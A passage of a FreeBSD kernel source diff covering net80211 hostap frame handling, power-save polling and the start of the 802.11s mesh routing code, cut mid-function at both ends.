IEEE80211_NODE_QOS; } else ni->ni_flags &= ~IEEE80211_NODE_QOS; #ifdef IEEE80211_SUPPORT_SUPERG if (ath != NULL) { setie(ath_ie, ath - sfrm); /* * Parse ATH station parameters. */ ieee80211_parse_ath(ni, ni->ni_ies.ath_ie); } else #endif ni->ni_ath_flags = 0; #undef setie } else { ni->ni_flags &= ~IEEE80211_NODE_QOS; ni->ni_ath_flags = 0; } ieee80211_node_join(ni, resp); ieee80211_deliver_l2uf(ni); break; } case IEEE80211_FC0_SUBTYPE_DEAUTH: case IEEE80211_FC0_SUBTYPE_DISASSOC: { uint16_t reason; if (vap->iv_state != IEEE80211_S_RUN || /* NB: can happen when in promiscuous mode */ !IEEE80211_ADDR_EQ(wh->i_addr1, vap->iv_myaddr)) { vap->iv_stats.is_rx_mgtdiscard++; break; } /* * deauth/disassoc frame format * [2] reason */ IEEE80211_VERIFY_LENGTH(efrm - frm, 2, return); reason = le16toh(*(uint16_t *)frm); if (subtype == IEEE80211_FC0_SUBTYPE_DEAUTH) { vap->iv_stats.is_rx_deauth++; IEEE80211_NODE_STAT(ni, rx_deauth); } else { vap->iv_stats.is_rx_disassoc++; IEEE80211_NODE_STAT(ni, rx_disassoc); } IEEE80211_NOTE(vap, IEEE80211_MSG_AUTH, ni, "recv %s (reason %d)", ieee80211_mgt_subtype_name[subtype >> IEEE80211_FC0_SUBTYPE_SHIFT], reason); if (ni != vap->iv_bss) ieee80211_node_leave(ni); break; } case IEEE80211_FC0_SUBTYPE_ACTION: case IEEE80211_FC0_SUBTYPE_ACTION_NOACK: if (ni == vap->iv_bss) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "unknown node"); vap->iv_stats.is_rx_mgtdiscard++; } else if (!IEEE80211_ADDR_EQ(vap->iv_myaddr, wh->i_addr1) && !IEEE80211_IS_MULTICAST(wh->i_addr1)) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "not for us"); vap->iv_stats.is_rx_mgtdiscard++; } else if (vap->iv_state != IEEE80211_S_RUN) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "wrong state %s", ieee80211_state_name[vap->iv_state]); vap->iv_stats.is_rx_mgtdiscard++; } else { if (ieee80211_parse_action(ni, m0) == 0) (void)ic->ic_recv_action(ni, wh, frm, efrm); } break; case IEEE80211_FC0_SUBTYPE_ASSOC_RESP: case IEEE80211_FC0_SUBTYPE_REASSOC_RESP: case IEEE80211_FC0_SUBTYPE_ATIM: IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "not handled"); vap->iv_stats.is_rx_mgtdiscard++; break; default: IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, "mgt", "subtype 0x%x not handled", subtype); vap->iv_stats.is_rx_badsubtype++; break; } } static void hostap_recv_ctl(struct ieee80211_node *ni, struct mbuf *m, int subtype) { switch (subtype) { case IEEE80211_FC0_SUBTYPE_PS_POLL: ni->ni_vap->iv_recv_pspoll(ni, m); break; case IEEE80211_FC0_SUBTYPE_BAR: ieee80211_recv_bar(ni, m); break; } } /* * Process a received ps-poll frame. */ void ieee80211_recv_pspoll(struct ieee80211_node *ni, struct mbuf *m0) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = vap->iv_ic; struct ieee80211_frame_min *wh; struct mbuf *m; uint16_t aid; int qlen; wh = mtod(m0, struct ieee80211_frame_min *); if (ni->ni_associd == 0) { IEEE80211_DISCARD(vap, IEEE80211_MSG_POWER | IEEE80211_MSG_DEBUG, (struct ieee80211_frame *) wh, NULL, "%s", "unassociated station"); vap->iv_stats.is_ps_unassoc++; IEEE80211_SEND_MGMT(ni, IEEE80211_FC0_SUBTYPE_DEAUTH, IEEE80211_REASON_NOT_ASSOCED); return; } aid = le16toh(*(uint16_t *)wh->i_dur); if (aid != ni->ni_associd) { IEEE80211_DISCARD(vap, IEEE80211_MSG_POWER | IEEE80211_MSG_DEBUG, (struct ieee80211_frame *) wh, NULL, "aid mismatch: sta aid 0x%x poll aid 0x%x", ni->ni_associd, aid); vap->iv_stats.is_ps_badaid++; /* * NB: We used to deauth the station but it turns out * the Blackberry Curve 8230 (and perhaps other devices) * sometimes send the wrong AID when WME is negotiated. * Being more lenient here seems ok as we already check * the station is associated and we only return frames * queued for the station (i.e. we don't use the AID). */ return; } /* Okay, take the first queued packet and put it out... */ m = ieee80211_node_psq_dequeue(ni, &qlen); if (m == NULL) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_POWER, wh->i_addr2, "%s", "recv ps-poll, but queue empty"); ieee80211_send_nulldata(ieee80211_ref_node(ni)); vap->iv_stats.is_ps_qempty++; /* XXX node stat */ if (vap->iv_set_tim != NULL) vap->iv_set_tim(ni, 0); /* just in case */ return; } /* * If there are more packets, set the more packets bit * in the packet dispatched to the station; otherwise * turn off the TIM bit. */ if (qlen != 0) { IEEE80211_NOTE(vap, IEEE80211_MSG_POWER, ni, "recv ps-poll, send packet, %u still queued", qlen); m->m_flags |= M_MORE_DATA; } else { IEEE80211_NOTE(vap, IEEE80211_MSG_POWER, ni, "%s", "recv ps-poll, send packet, queue empty"); if (vap->iv_set_tim != NULL) vap->iv_set_tim(ni, 0); } m->m_flags |= M_PWR_SAV; /* bypass PS handling */ /* * Do the right thing; if it's an encap'ed frame then * call ieee80211_parent_xmitpkt() (and free the ref) else * call ieee80211_vap_xmitpkt(). */ if (m->m_flags & M_ENCAP) { if (ieee80211_parent_xmitpkt(ic, m) != 0) ieee80211_free_node(ni); } else { (void) ieee80211_vap_xmitpkt(vap, m); } } diff --git a/sys/net80211/ieee80211_mesh.c b/sys/net80211/ieee80211_mesh.c index d18483ea0565..4aff6bd51689 100644 --- a/sys/net80211/ieee80211_mesh.c +++ b/sys/net80211/ieee80211_mesh.c @@ -1,3635 +1,3635 @@ /*- * Copyright (c) 2009 The FreeBSD Foundation * All rights reserved. * * This software was developed by Rui Paulo under sponsorship from the * FreeBSD Foundation. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #include #ifdef __FreeBSD__ __FBSDID("$FreeBSD$"); #endif /* * IEEE 802.11s Mesh Point (MBSS) support. * * Based on March 2009, D3.0 802.11s draft spec. */ #include "opt_inet.h" #include "opt_wlan.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef IEEE80211_SUPPORT_SUPERG #include #endif #include #include static void mesh_rt_flush_invalid(struct ieee80211vap *); static int mesh_select_proto_path(struct ieee80211vap *, const char *); static int mesh_select_proto_metric(struct ieee80211vap *, const char *); static void mesh_vattach(struct ieee80211vap *); static int mesh_newstate(struct ieee80211vap *, enum ieee80211_state, int); static void mesh_rt_cleanup_cb(void *); static void mesh_gatemode_setup(struct ieee80211vap *); static void mesh_gatemode_cb(void *); static void mesh_linkchange(struct ieee80211_node *, enum ieee80211_mesh_mlstate); static void mesh_checkid(void *, struct ieee80211_node *); static uint32_t mesh_generateid(struct ieee80211vap *); static int mesh_checkpseq(struct ieee80211vap *, const uint8_t [IEEE80211_ADDR_LEN], uint32_t); static void mesh_transmit_to_gate(struct ieee80211vap *, struct mbuf *, struct ieee80211_mesh_route *); static void mesh_forward(struct ieee80211vap *, struct mbuf *, const struct ieee80211_meshcntl *); static int mesh_input(struct ieee80211_node *, struct mbuf *, int, int); static void mesh_recv_mgmt(struct ieee80211_node *, struct mbuf *, int, int, int); static void mesh_recv_ctl(struct ieee80211_node *, struct mbuf *, int); static void mesh_peer_timeout_setup(struct ieee80211_node *); static void mesh_peer_timeout_backoff(struct ieee80211_node *); static void mesh_peer_timeout_cb(void *); static __inline void mesh_peer_timeout_stop(struct ieee80211_node *); static int mesh_verify_meshid(struct ieee80211vap *, const uint8_t *); static int mesh_verify_meshconf(struct ieee80211vap *, const uint8_t *); static int mesh_verify_meshpeer(struct ieee80211vap *, uint8_t, const uint8_t *); uint32_t mesh_airtime_calc(struct ieee80211_node *); /* * Timeout values come from the specification and are in milliseconds. */ static SYSCTL_NODE(_net_wlan, OID_AUTO, mesh, CTLFLAG_RD, 0, "IEEE 802.11s parameters"); static int ieee80211_mesh_gateint = -1; SYSCTL_PROC(_net_wlan_mesh, OID_AUTO, gateint, CTLTYPE_INT | CTLFLAG_RW, &ieee80211_mesh_gateint, 0, ieee80211_sysctl_msecs_ticks, "I", "mesh gate interval (ms)"); static int ieee80211_mesh_retrytimeout = -1; SYSCTL_PROC(_net_wlan_mesh, OID_AUTO, retrytimeout, CTLTYPE_INT | CTLFLAG_RW, &ieee80211_mesh_retrytimeout, 0, ieee80211_sysctl_msecs_ticks, "I", "Retry timeout (msec)"); static int ieee80211_mesh_holdingtimeout = -1; SYSCTL_PROC(_net_wlan_mesh, OID_AUTO, holdingtimeout, CTLTYPE_INT | CTLFLAG_RW, &ieee80211_mesh_holdingtimeout, 0, ieee80211_sysctl_msecs_ticks, "I", "Holding state timeout (msec)"); static int ieee80211_mesh_confirmtimeout = -1; SYSCTL_PROC(_net_wlan_mesh, OID_AUTO, confirmtimeout, CTLTYPE_INT | CTLFLAG_RW, &ieee80211_mesh_confirmtimeout, 0, ieee80211_sysctl_msecs_ticks, "I", "Confirm state timeout (msec)"); static int ieee80211_mesh_backofftimeout = -1; SYSCTL_PROC(_net_wlan_mesh, OID_AUTO, backofftimeout, CTLTYPE_INT | CTLFLAG_RW, &ieee80211_mesh_backofftimeout, 0, ieee80211_sysctl_msecs_ticks, "I", "Backoff timeout (msec). This is to throutles peering forever when " "not receving answer or is rejected by a neighbor"); static int ieee80211_mesh_maxretries = 2; SYSCTL_INT(_net_wlan_mesh, OID_AUTO, maxretries, CTLTYPE_INT | CTLFLAG_RW, &ieee80211_mesh_maxretries, 0, "Maximum retries during peer link establishment"); static int ieee80211_mesh_maxholding = 2; SYSCTL_INT(_net_wlan_mesh, OID_AUTO, maxholding, CTLTYPE_INT | CTLFLAG_RW, &ieee80211_mesh_maxholding, 0, "Maximum times we are allowed to transition to HOLDING state before " "backinoff during peer link establishment"); static const uint8_t broadcastaddr[IEEE80211_ADDR_LEN] = { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff }; static ieee80211_recv_action_func mesh_recv_action_meshpeering_open; static ieee80211_recv_action_func mesh_recv_action_meshpeering_confirm; static ieee80211_recv_action_func mesh_recv_action_meshpeering_close; static ieee80211_recv_action_func mesh_recv_action_meshlmetric; static ieee80211_recv_action_func mesh_recv_action_meshgate; static ieee80211_send_action_func mesh_send_action_meshpeering_open; static ieee80211_send_action_func mesh_send_action_meshpeering_confirm; static ieee80211_send_action_func mesh_send_action_meshpeering_close; static ieee80211_send_action_func mesh_send_action_meshlmetric; static ieee80211_send_action_func mesh_send_action_meshgate; static const struct ieee80211_mesh_proto_metric mesh_metric_airtime = { .mpm_descr = "AIRTIME", .mpm_ie = IEEE80211_MESHCONF_METRIC_AIRTIME, .mpm_metric = mesh_airtime_calc, }; static struct ieee80211_mesh_proto_path mesh_proto_paths[4]; static struct ieee80211_mesh_proto_metric mesh_proto_metrics[4]; #define RT_ENTRY_LOCK(rt) mtx_lock(&(rt)->rt_lock) #define RT_ENTRY_LOCK_ASSERT(rt) mtx_assert(&(rt)->rt_lock, MA_OWNED) #define RT_ENTRY_UNLOCK(rt) mtx_unlock(&(rt)->rt_lock) #define MESH_RT_LOCK(ms) mtx_lock(&(ms)->ms_rt_lock) #define MESH_RT_LOCK_ASSERT(ms) mtx_assert(&(ms)->ms_rt_lock, MA_OWNED) #define MESH_RT_UNLOCK(ms) mtx_unlock(&(ms)->ms_rt_lock) MALLOC_DEFINE(M_80211_MESH_PREQ, "80211preq", "802.11 MESH Path Request frame"); MALLOC_DEFINE(M_80211_MESH_PREP, "80211prep", "802.11 MESH Path Reply frame"); MALLOC_DEFINE(M_80211_MESH_PERR, "80211perr", "802.11 MESH Path Error frame"); /* The longer one of the lifetime should be stored as new lifetime */ #define MESH_ROUTE_LIFETIME_MAX(a, b) (a > b ? a : b) MALLOC_DEFINE(M_80211_MESH_RT, "80211mesh_rt", "802.11s routing table"); MALLOC_DEFINE(M_80211_MESH_GT_RT, "80211mesh_gt", "802.11s known gates table"); /* * Helper functions to manipulate the Mesh routing table. */ static struct ieee80211_mesh_route * mesh_rt_find_locked(struct ieee80211_mesh_state *ms, const uint8_t dest[IEEE80211_ADDR_LEN]) { struct ieee80211_mesh_route *rt; MESH_RT_LOCK_ASSERT(ms); TAILQ_FOREACH(rt, &ms->ms_routes, rt_next) { if (IEEE80211_ADDR_EQ(dest, rt->rt_dest)) return rt; } return NULL; } static struct ieee80211_mesh_route * mesh_rt_add_locked(struct ieee80211vap *vap, const uint8_t dest[IEEE80211_ADDR_LEN]) { struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_mesh_route *rt; KASSERT(!IEEE80211_ADDR_EQ(broadcastaddr, dest), ("%s: adding broadcast to the routing table", __func__)); MESH_RT_LOCK_ASSERT(ms); rt = malloc(ALIGN(sizeof(struct ieee80211_mesh_route)) + ms->ms_ppath->mpp_privlen, M_80211_MESH_RT, M_NOWAIT | M_ZERO); if (rt != NULL) { rt->rt_vap = vap; IEEE80211_ADDR_COPY(rt->rt_dest, dest); rt->rt_priv = (void *)ALIGN(&rt[1]); mtx_init(&rt->rt_lock, "MBSS_RT", "802.11s route entry", MTX_DEF); callout_init(&rt->rt_discovery, CALLOUT_MPSAFE); rt->rt_updtime = ticks; /* create time */ TAILQ_INSERT_TAIL(&ms->ms_routes, rt, rt_next); } return rt; } struct ieee80211_mesh_route * ieee80211_mesh_rt_find(struct ieee80211vap *vap, const uint8_t dest[IEEE80211_ADDR_LEN]) { struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_mesh_route *rt; MESH_RT_LOCK(ms); rt = mesh_rt_find_locked(ms, dest); MESH_RT_UNLOCK(ms); return rt; } struct ieee80211_mesh_route * ieee80211_mesh_rt_add(struct ieee80211vap *vap, const uint8_t dest[IEEE80211_ADDR_LEN]) { struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_mesh_route *rt; KASSERT(ieee80211_mesh_rt_find(vap, dest) == NULL, ("%s: duplicate entry in the routing table", __func__)); KASSERT(!IEEE80211_ADDR_EQ(vap->iv_myaddr, dest), ("%s: adding self to the routing table", __func__)); MESH_RT_LOCK(ms); rt = mesh_rt_add_locked(vap, dest); MESH_RT_UNLOCK(ms); return rt; } /* * Update the route lifetime and returns the updated lifetime. * If new_lifetime is zero and route is timedout it will be invalidated. * new_lifetime is in msec */ int ieee80211_mesh_rt_update(struct ieee80211_mesh_route *rt, int new_lifetime) { int timesince, now; uint32_t lifetime = 0; KASSERT(rt != NULL, ("route is NULL")); now = ticks; RT_ENTRY_LOCK(rt); /* dont clobber a proxy entry gated by us */ if (rt->rt_flags & IEEE80211_MESHRT_FLAGS_PROXY && rt->rt_nhops == 0) { RT_ENTRY_UNLOCK(rt); return rt->rt_lifetime; } timesince = ticks_to_msecs(now - rt->rt_updtime); rt->rt_updtime = now; if (timesince >= rt->rt_lifetime) { if (new_lifetime != 0) { rt->rt_lifetime = new_lifetime; } else { rt->rt_flags &= ~IEEE80211_MESHRT_FLAGS_VALID; rt->rt_lifetime = 0; } } else { /* update what is left of lifetime */ rt->rt_lifetime = rt->rt_lifetime - timesince; rt->rt_lifetime = MESH_ROUTE_LIFETIME_MAX( new_lifetime, rt->rt_lifetime); } lifetime = rt->rt_lifetime; RT_ENTRY_UNLOCK(rt); return lifetime; } /* * Add a proxy route (as needed) for the specified destination. */ void ieee80211_mesh_proxy_check(struct ieee80211vap *vap, const uint8_t dest[IEEE80211_ADDR_LEN]) { struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_mesh_route *rt; MESH_RT_LOCK(ms); rt = mesh_rt_find_locked(ms, dest); if (rt == NULL) { rt = mesh_rt_add_locked(vap, dest); if (rt == NULL) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_MESH, dest, "%s", "unable to add proxy entry"); vap->iv_stats.is_mesh_rtaddfailed++; } else { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_MESH, dest, "%s", "add proxy entry"); IEEE80211_ADDR_COPY(rt->rt_mesh_gate, vap->iv_myaddr); IEEE80211_ADDR_COPY(rt->rt_nexthop, vap->iv_myaddr); rt->rt_flags |= IEEE80211_MESHRT_FLAGS_VALID | IEEE80211_MESHRT_FLAGS_PROXY; } } else if ((rt->rt_flags & IEEE80211_MESHRT_FLAGS_VALID) == 0) { KASSERT(rt->rt_flags & IEEE80211_MESHRT_FLAGS_PROXY, ("no proxy flag for poxy entry")); struct ieee80211com *ic = vap->iv_ic; /* * Fix existing entry created by received frames from * stations that have some memory of dest. We also * flush any frames held on the staging queue; delivering * them is too much trouble right now. */ IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_MESH, dest, "%s", "fix proxy entry"); IEEE80211_ADDR_COPY(rt->rt_nexthop, vap->iv_myaddr); rt->rt_flags |= IEEE80211_MESHRT_FLAGS_VALID | IEEE80211_MESHRT_FLAGS_PROXY; /* XXX belongs in hwmp */ ieee80211_ageq_drain_node(&ic->ic_stageq, (void *)(uintptr_t) ieee80211_mac_hash(ic, dest)); /* XXX stat? */ } MESH_RT_UNLOCK(ms); } static __inline void mesh_rt_del(struct ieee80211_mesh_state *ms, struct ieee80211_mesh_route *rt) { TAILQ_REMOVE(&ms->ms_routes, rt, rt_next); /* * Grab the lock before destroying it, to be sure no one else * is holding the route. */ RT_ENTRY_LOCK(rt); callout_drain(&rt->rt_discovery); mtx_destroy(&rt->rt_lock); free(rt, M_80211_MESH_RT); } void ieee80211_mesh_rt_del(struct ieee80211vap *vap, const uint8_t dest[IEEE80211_ADDR_LEN]) { struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_mesh_route *rt, *next; MESH_RT_LOCK(ms); TAILQ_FOREACH_SAFE(rt, &ms->ms_routes, rt_next, next) { if (IEEE80211_ADDR_EQ(rt->rt_dest, dest)) { if (rt->rt_flags & IEEE80211_MESHRT_FLAGS_PROXY) { ms->ms_ppath->mpp_senderror(vap, dest, rt, IEEE80211_REASON_MESH_PERR_NO_PROXY); } else { ms->ms_ppath->mpp_senderror(vap, dest, rt, IEEE80211_REASON_MESH_PERR_DEST_UNREACH); } mesh_rt_del(ms, rt); MESH_RT_UNLOCK(ms); return; } } MESH_RT_UNLOCK(ms); } void ieee80211_mesh_rt_flush(struct ieee80211vap *vap) { struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_mesh_route *rt, *next; if (ms == NULL) return; MESH_RT_LOCK(ms); TAILQ_FOREACH_SAFE(rt, &ms->ms_routes, rt_next, next) mesh_rt_del(ms, rt); MESH_RT_UNLOCK(ms); } void ieee80211_mesh_rt_flush_peer(struct ieee80211vap *vap, const uint8_t peer[IEEE80211_ADDR_LEN]) { struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_mesh_route *rt, *next; MESH_RT_LOCK(ms); TAILQ_FOREACH_SAFE(rt, &ms->ms_routes, rt_next, next) { if (IEEE80211_ADDR_EQ(rt->rt_nexthop, peer)) mesh_rt_del(ms, rt); } MESH_RT_UNLOCK(ms); } /* * Flush expired routing entries, i.e. those in invalid state for * some time. */ static void mesh_rt_flush_invalid(struct ieee80211vap *vap) { struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_mesh_route *rt, *next; if (ms == NULL) return; MESH_RT_LOCK(ms); TAILQ_FOREACH_SAFE(rt, &ms->ms_routes, rt_next, next) { /* Discover paths will be deleted by their own callout */ if (rt->rt_flags & IEEE80211_MESHRT_FLAGS_DISCOVER) continue; ieee80211_mesh_rt_update(rt, 0); if ((rt->rt_flags & IEEE80211_MESHRT_FLAGS_VALID) == 0) mesh_rt_del(ms, rt); } MESH_RT_UNLOCK(ms); } #define N(a) (sizeof(a) / sizeof(a[0])) int ieee80211_mesh_register_proto_path(const struct ieee80211_mesh_proto_path *mpp) { int i, firstempty = -1; for (i = 0; i < N(mesh_proto_paths); i++) { if (strncmp(mpp->mpp_descr, mesh_proto_paths[i].mpp_descr, IEEE80211_MESH_PROTO_DSZ) == 0) return EEXIST; if (!mesh_proto_paths[i].mpp_active && firstempty == -1) firstempty = i; } if (firstempty < 0) return ENOSPC; memcpy(&mesh_proto_paths[firstempty], mpp, sizeof(*mpp)); mesh_proto_paths[firstempty].mpp_active = 1; return 0; } int ieee80211_mesh_register_proto_metric(const struct ieee80211_mesh_proto_metric *mpm) { int i, firstempty = -1; for (i = 0; i < N(mesh_proto_metrics); i++) { if (strncmp(mpm->mpm_descr, mesh_proto_metrics[i].mpm_descr, IEEE80211_MESH_PROTO_DSZ) == 0) return EEXIST; if (!mesh_proto_metrics[i].mpm_active && firstempty == -1) firstempty = i; } if (firstempty < 0) return ENOSPC; memcpy(&mesh_proto_metrics[firstempty], mpm, sizeof(*mpm)); mesh_proto_metrics[firstempty].mpm_active = 1; return 0; } static int mesh_select_proto_path(struct ieee80211vap *vap, const char *name) { struct ieee80211_mesh_state *ms = vap->iv_mesh; int i; for (i = 0; i < N(mesh_proto_paths); i++) { if (strcasecmp(mesh_proto_paths[i].mpp_descr, name) == 0) { ms->ms_ppath = &mesh_proto_paths[i]; return 0; } } return ENOENT; } static int mesh_select_proto_metric(struct ieee80211vap *vap, const char *name) { struct ieee80211_mesh_state *ms = vap->iv_mesh; int i; for (i = 0; i < N(mesh_proto_metrics); i++) { if (strcasecmp(mesh_proto_metrics[i].mpm_descr, name) == 0) { ms->ms_pmetric = &mesh_proto_metrics[i]; return 0; } } return ENOENT; } #undef N static void mesh_gatemode_setup(struct ieee80211vap *vap) { struct ieee80211_mesh_state *ms = vap->iv_mesh; /* * NB: When a mesh gate is running as a ROOT it shall * not send out periodic GANNs but instead mark the * mesh gate flag for the corresponding proactive PREQ * and RANN frames. */ if (ms->ms_flags & IEEE80211_MESHFLAGS_ROOT || (ms->ms_flags & IEEE80211_MESHFLAGS_GATE) == 0) { callout_drain(&ms->ms_gatetimer); return ; } callout_reset(&ms->ms_gatetimer, ieee80211_mesh_gateint, mesh_gatemode_cb, vap); } static void mesh_gatemode_cb(void *arg) { struct ieee80211vap *vap = (struct ieee80211vap *)arg; struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_meshgann_ie gann; gann.gann_flags = 0; /* Reserved */ gann.gann_hopcount = 0; gann.gann_ttl = ms->ms_ttl; IEEE80211_ADDR_COPY(gann.gann_addr, vap->iv_myaddr); gann.gann_seq = ms->ms_gateseq++; gann.gann_interval = ieee80211_mesh_gateint; IEEE80211_NOTE(vap, IEEE80211_MSG_MESH, vap->iv_bss, "send broadcast GANN (seq %u)", gann.gann_seq); ieee80211_send_action(vap->iv_bss, IEEE80211_ACTION_CAT_MESH, IEEE80211_ACTION_MESH_GANN, &gann); mesh_gatemode_setup(vap); } static void ieee80211_mesh_init(void) { memset(mesh_proto_paths, 0, sizeof(mesh_proto_paths)); memset(mesh_proto_metrics, 0, sizeof(mesh_proto_metrics)); /* * Setup mesh parameters that depends on the clock frequency. */ ieee80211_mesh_gateint = msecs_to_ticks(10000); ieee80211_mesh_retrytimeout = msecs_to_ticks(40); ieee80211_mesh_holdingtimeout = msecs_to_ticks(40); ieee80211_mesh_confirmtimeout = msecs_to_ticks(40); ieee80211_mesh_backofftimeout = msecs_to_ticks(5000); /* * Register action frame handlers. */ ieee80211_recv_action_register(IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_OPEN, mesh_recv_action_meshpeering_open); ieee80211_recv_action_register(IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CONFIRM, mesh_recv_action_meshpeering_confirm); ieee80211_recv_action_register(IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CLOSE, mesh_recv_action_meshpeering_close); ieee80211_recv_action_register(IEEE80211_ACTION_CAT_MESH, IEEE80211_ACTION_MESH_LMETRIC, mesh_recv_action_meshlmetric); ieee80211_recv_action_register(IEEE80211_ACTION_CAT_MESH, IEEE80211_ACTION_MESH_GANN, mesh_recv_action_meshgate); ieee80211_send_action_register(IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_OPEN, mesh_send_action_meshpeering_open); ieee80211_send_action_register(IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CONFIRM, mesh_send_action_meshpeering_confirm); ieee80211_send_action_register(IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CLOSE, mesh_send_action_meshpeering_close); ieee80211_send_action_register(IEEE80211_ACTION_CAT_MESH, IEEE80211_ACTION_MESH_LMETRIC, mesh_send_action_meshlmetric); ieee80211_send_action_register(IEEE80211_ACTION_CAT_MESH, IEEE80211_ACTION_MESH_GANN, mesh_send_action_meshgate); /* * Register Airtime Link Metric. */ ieee80211_mesh_register_proto_metric(&mesh_metric_airtime); } SYSINIT(wlan_mesh, SI_SUB_DRIVERS, SI_ORDER_FIRST, ieee80211_mesh_init, NULL); void ieee80211_mesh_attach(struct ieee80211com *ic) { ic->ic_vattach[IEEE80211_M_MBSS] = mesh_vattach; } void ieee80211_mesh_detach(struct ieee80211com *ic) { } static void mesh_vdetach_peers(void *arg, struct ieee80211_node *ni) { struct ieee80211com *ic = ni->ni_ic; uint16_t args[3]; if (ni->ni_mlstate == IEEE80211_NODE_MESH_ESTABLISHED) { args[0] = ni->ni_mlpid; args[1] = ni->ni_mllid; args[2] = IEEE80211_REASON_PEER_LINK_CANCELED; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CLOSE, args); } callout_drain(&ni->ni_mltimer); /* XXX belongs in hwmp */ ieee80211_ageq_drain_node(&ic->ic_stageq, (void *)(uintptr_t) ieee80211_mac_hash(ic, ni->ni_macaddr)); } static void mesh_vdetach(struct ieee80211vap *vap) { struct ieee80211_mesh_state *ms = vap->iv_mesh; callout_drain(&ms->ms_cleantimer); ieee80211_iterate_nodes(&vap->iv_ic->ic_sta, mesh_vdetach_peers, NULL); ieee80211_mesh_rt_flush(vap); mtx_destroy(&ms->ms_rt_lock); ms->ms_ppath->mpp_vdetach(vap); free(vap->iv_mesh, M_80211_VAP); vap->iv_mesh = NULL; } static void mesh_vattach(struct ieee80211vap *vap) { struct ieee80211_mesh_state *ms; vap->iv_newstate = mesh_newstate; vap->iv_input = mesh_input; vap->iv_opdetach = mesh_vdetach; vap->iv_recv_mgmt = mesh_recv_mgmt; vap->iv_recv_ctl = mesh_recv_ctl; ms = malloc(sizeof(struct ieee80211_mesh_state), M_80211_VAP, M_NOWAIT | M_ZERO); if (ms == NULL) { printf("%s: couldn't alloc MBSS state\n", __func__); return; } vap->iv_mesh = ms; ms->ms_seq = 0; ms->ms_flags = (IEEE80211_MESHFLAGS_AP | IEEE80211_MESHFLAGS_FWD); ms->ms_ttl = IEEE80211_MESH_DEFAULT_TTL; TAILQ_INIT(&ms->ms_known_gates); TAILQ_INIT(&ms->ms_routes); mtx_init(&ms->ms_rt_lock, "MBSS", "802.11s routing table", MTX_DEF); callout_init(&ms->ms_cleantimer, CALLOUT_MPSAFE); callout_init(&ms->ms_gatetimer, CALLOUT_MPSAFE); ms->ms_gateseq = 0; mesh_select_proto_metric(vap, "AIRTIME"); KASSERT(ms->ms_pmetric, ("ms_pmetric == NULL")); mesh_select_proto_path(vap, "HWMP"); KASSERT(ms->ms_ppath, ("ms_ppath == NULL")); ms->ms_ppath->mpp_vattach(vap); } /* * IEEE80211_M_MBSS vap state machine handler. */ static int mesh_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211com *ic = vap->iv_ic; struct ieee80211_node *ni; enum ieee80211_state ostate; IEEE80211_LOCK_ASSERT(ic); ostate = vap->iv_state; IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: %s -> %s (%d)\n", __func__, ieee80211_state_name[ostate], ieee80211_state_name[nstate], arg); vap->iv_state = nstate; /* state transition */ if (ostate != IEEE80211_S_SCAN) ieee80211_cancel_scan(vap); /* background scan */ ni = vap->iv_bss; /* NB: no reference held */ if (nstate != IEEE80211_S_RUN && ostate == IEEE80211_S_RUN) { callout_drain(&ms->ms_cleantimer); callout_drain(&ms->ms_gatetimer); } switch (nstate) { case 